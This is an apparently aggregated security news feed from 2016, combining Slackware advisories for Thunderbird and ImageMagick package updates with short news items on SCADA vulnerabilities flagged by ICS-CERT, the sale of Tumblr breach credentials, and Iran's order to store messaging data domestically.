New mozilla-thunderbird packages are available for Slackware 14.1 and -current

to fix security issues.

Here are the details from the Slackware 14.1 ChangeLog:

+--------------------------+

patches/packages/mozilla-thunderbird-45.1.1-i486-1_slack14.1.txz: Upgraded.

This release contains security fixes and improvements.

For more information, see:

http://ift.tt/17zaBaq

(* Security fix *)

+--------------------------+

Where to find the new packages:

+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab

(http://osuosl.org) for donating FTP and rsync hosting

to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for

additional mirror sites near you.

Updated package for Slackware 14.1:

http://ift.tt/1T7HxL5

zilla-thunderbird-45.1.1-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:

http://ift.tt/23GQu2H

mozilla-thunderbird-45.1.1-x86_64-1_slack14.1.txz

Updated package for Slackware -current:

http://ift.tt/1UUO14x

zilla-thunderbird-45.1.1-i586-1.txz

Updated package for Slackware x86_64 -current:

http://ift.tt/23GQu2O

p/mozilla-thunderbird-45.1.1-x86_64-1.txz

MD5 signatures:

+-------------+

Slackware 14.1 package:

98a00ae519ae51da2cbb85ec7ac1b9d7 mozilla-thunderbird-45.1.1-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:

ffe3684e497ac678daf23aca4837137c mozilla-thunderbird-45.1.1-x86_64-1_slack14.1.txz

Slackware -current package:

7fb7a78c6a90eeab2098b9c25ad2cb60 xap/mozilla-thunderbird-45.1.1-i586-1.txz

Slackware x86_64 -current package:

0b5e9a34d9a756da77891a16d2cebc26 xap/mozilla-thunderbird-45.1.1-x86_64-1.txz

Installation instructions:

+------------------------+

Upgrade the package as root:

# upgradepkg mozilla-thunderbird-45.1.1-i486-1_slack14.1.txz

+-----+

Slackware Linux Security Team

http://ift.tt/1yLfFre

security (at) slackware (dot) com [email concealed]

+-----------------------------------------------------------------------

-+

| To leave the slackware-security mailing list: |

+-----------------------------------------------------------------------

-+

| Send an email to majordomo (at) slackware (dot) com [email concealed] with this text in the body of |

| the email message: |

| |

| unsubscribe slackware-security |

| |

| You will get a confirmation message back containing instructions to |

| complete the process. Please do not reply to this email address. |

+-----------------------------------------------------------------------

-+

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1

iEYEARECAAYFAldNJM0ACgkQakRjwEAQIjMVSQCfWxSlf57kH5NlU+dLseu67Vea

imAAoILP4VJpee+r2sahi3wn4rhqU33Z

=x5xW

-----END PGP SIGNATURE-----

[ reply ]

from SecurityFocus Vulnerabilities http://ift.tt/1sImXdv

US ICS-CERT Urges Admins to Mitigate New SCADA Risk

The US Department of Homeland Security has issued an alert urging IT administrators in the energy sector to take steps to mitigate two serious vulnerabilities in SCADA products.

The alert came late last week from the department’s ICS-CERT, and concerns two bugs discovered by independent researcher Maxim Rupp in products built by US firm Environmental Systems Corporation (ESC).

Crucially, the products affected – ESC 8832 Version 3.02 and earlier versions – don’t have enough memory space to implement a patch, meaning a firmware upgrade is out of the question.

The alert continued:

“Successful exploitation of these vulnerabilities may allow attackers to perform administrative operations over the network without authentication.

Impact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment, architecture, and product implementation.”

Both bugs have been given a CVSS v3 base score of 7.5.

The first – CVE-2016-4501 – is an authentication bypass vulnerability which could allow an attacker to make unauthorized modifications to the device’s configuration.

The second – CVE-2016-4502 – is a privilege management bug which could allow a hacker to “gain access to functions, which are not displayed in the menu for the user by means of brute force of a parameter.”

An attacker with only low skill could exploit these two vulnerabilities remotely, ICS-CERT warned.

To mitigate the risk of such an exploit, ESC recommends admins either upgrade the device, block Port 80 with a firewall, or manage the device not through the web interface but alternative means.

The affected product is used mainly in the energy sector in the United States, the advisory claimed.

Internet-connected SCADA systems are increasingly exposed to remote cyber attacks – especially those in mission critical deployments where administrators are reluctant to schedule downtime to patch them.

Last Christmas a major attack on power stations in Ukraine led to a serious power outage.  

from Infosecurity - Latest New... http://ift.tt/1XaThmv

Bugtraq: [slackware-security] imagemagick (SSA:2016-152-01)

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

[slackware-security] imagemagick (SSA:2016-152-01)

New imagemagick packages are available for Slackware 14.0, 14.1, and -current

to fix a security issue.

Here are the details from the Slackware 14.1 ChangeLog:

+--------------------------+

patches/packages/imagemagick-6.8.6_10-i486-3_slack14.1.txz: Rebuilt.

Removed popen() support to prevent another shell vulnerability. This

issue was discovered by Bob Friesenhahn, of the GraphicsMagick project.

For more information, see:

http://ift.tt/1VrXtwk

(* Security fix *)

+--------------------------+

Where to find the new packages:

+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab

(http://osuosl.org) for donating FTP and rsync hosting

to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for

additional mirror sites near you.

Updated package for Slackware 14.0:

http://ift.tt/23GQtMr

agemagick-6.7.7_10-i486-3_slack14.0.txz

Updated package for Slackware x86_64 14.0:

http://ift.tt/23GQu2F

imagemagick-6.7.7_10-x86_64-3_slack14.0.txz

Updated package for Slackware 14.1:

http://ift.tt/23GQvDK

agemagick-6.8.6_10-i486-3_slack14.1.txz

Updated package for Slackware x86_64 14.1:

http://ift.tt/23GQu2H

imagemagick-6.8.6_10-x86_64-3_slack14.1.txz

Updated package for Slackware -current:

http://ift.tt/23GQu2J

agemagick-6.9.4_5-i586-1.txz

Updated package for Slackware x86_64 -current:

http://ift.tt/23GQu2O

p/imagemagick-6.9.4_5-x86_64-1.txz

MD5 signatures:

+-------------+

Slackware 14.0 package:

8038f31b0d67731c68d018cd83156763 imagemagick-6.7.7_10-i486-3_slack14.0.txz

Slackware x86_64 14.0 package:

0d9eb6efc627987cf1b99dab3e25d78b imagemagick-6.7.7_10-x86_64-3_slack14.0.txz

Slackware 14.1 package:

e3f901a4083406da10c93ee5979c98e2 imagemagick-6.8.6_10-i486-3_slack14.1.txz

Slackware x86_64 14.1 package:

cb65d697fbcb85bcd1d4cb816273731b imagemagick-6.8.6_10-x86_64-3_slack14.1.txz

Slackware -current package:

383e9ddac6637a4f847438716beaa256 xap/imagemagick-6.9.4_5-i586-1.txz

Slackware x86_64 -current package:

0c723689026530a689a1520ee959eaa1 xap/imagemagick-6.9.4_5-x86_64-1.txz

Installation instructions:

+------------------------+

Upgrade the package as root:

# upgradepkg imagemagick-6.8.6_10-i486-3_slack14.1.txz

+-----+

Slackware Linux Security Team

http://ift.tt/1yLfFre

security (at) slackware (dot) com [email concealed]

+-----------------------------------------------------------------------

-+

| To leave the slackware-security mailing list: |

+-----------------------------------------------------------------------

-+

| Send an email to majordomo (at) slackware (dot) com [email concealed] with this text in the body of |

| the email message: |

| |

| unsubscribe slackware-security |

| |

| You will get a confirmation message back containing instructions to |

| complete the process. Please do not reply to this email address. |

+-----------------------------------------------------------------------

-+

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1

iEYEARECAAYFAldNJMsACgkQakRjwEAQIjOsnQCeOe7KAtgJwyX+UGvyAiDnNPf9

SlAAnRhcGXt0gv90wwkVhf/459kJhc1l

=XkbZ

-----END PGP SIGNATURE-----

[ reply ]

from SecurityFocus Vulnerabilities http://ift.tt/22vgBe9

Bangladesh Bank officials perhaps played a part in $81m heist

Hacker Selling 65 Million Passwords From Tumblr Data Breach

Earlier this month Tumblr revealed that a third party had obtained access to a set of e-mail addresses and passwords dating back from early 2013, before being acquired by Yahoo.

At that time, Tumblr did not reveal the number of affected users, but in reality, around 65,469,298 accounts credentials were leaked in the 2013 Tumblr data breach, according to security expert Troy Hunt, who runs the site

Have I Been Pwned

.

"As soon as we became aware of this, our security team thoroughly investigated the matter. Our analysis gives us no reason to believe that this information was used to access Tumblr accounts," read Tumblr’s

blog

.

A Hacker, who is going by "peace_of_mind," is selling the Tumblr data for 0.4255 Bitcoin ($225) on the darknet marketplace

The Real Deal

.

The compromised data includes 65,469,298 unique e-mail addresses and "salted & hashed passwords."

The Same hacker is also selling the compromised login account data from Fling, LinkedIn, and MySpace. I wonder if he has more data sets yet to sell…

Salt makes passwords hard to crack, but you should still probably change it.

from The Hacker News http://ift.tt/25xgKmy

Iran orders all Messaging Apps to store its citizens' data within Country

Last year, Iran blocked Telegram and many other social networks after their founders refused to help Iranian authorities to spy on their citizens.

Now it looks like Iranian government wants tighter controls on all foreign messaging and social media apps operating in the country that will give the authorities a wider ability to monitor and censor its people.

All foreign messaging and social media apps operating in Iran have one year to move 'data and activity' associated with Iranian citizens onto servers in Iran, Reuters

reported

.

In order to comply with the new regulations, the companies would need to set up data centers in Iran within one year, but apps may lose a larger number of users by moving data onto Iranian servers.

However, transferring data to Iran servers might not be enough, as some of the most popular messaging services like

WhatsApp

,

Apple iMessage

, and Telegram are offering

end-to-end encrypted

communication i.e. nobody in between, not even WhatsApp can read the content of your messages.

Just two weeks back Iranian authorities arrested eight women with involvement in online “un-Islamic” modeling photographs without wearing the compulsory headscarf, and their Instagram page has been shut down, along with Facebook pages and business websites.

"

Telegram's data centres are to be moved inside the country so they can delete what they want and arrest who they want,

" @Mehrdxd said in a tweet.

from The Hacker News http://ift.tt/25vdLHS